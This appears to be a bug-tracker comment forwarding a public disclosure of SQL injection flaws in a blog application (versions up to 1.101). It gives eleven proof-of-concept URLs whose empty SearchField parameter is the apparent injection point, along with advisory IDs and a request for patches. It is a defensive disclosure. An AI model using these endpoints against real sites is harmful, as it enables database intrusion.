- priority: 5 --> 9
These vulnerabilities were originally reported by muuratsalo here: http://seclists.org/fulldisclosure/2011/Nov/302 (or another mailing list archive link: http://www.securityfocus.com/archive/1/520571). Do you have plans to patch these security vulnerabilities?
Affected versions: <= 1.101
Proof of concept addresses:
http://localhost/blogs/_authors_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/_blogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/_category_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/_comments_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/_policy_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/_rate_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/categoriesblogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/chosen_authors_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/chosen_blogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/chosen_comments_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/help_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
OSVDB IDs: 1167174,1167222,1167223,1167224,1167225,1167226,1167227,1167228,1167229,1167230,1167231
Secunia: SA46918
More information about SQL injection security vulnerabilities: https://www.owasp.org/index.php/SQL_Injection
In case you have any questions, please contact me!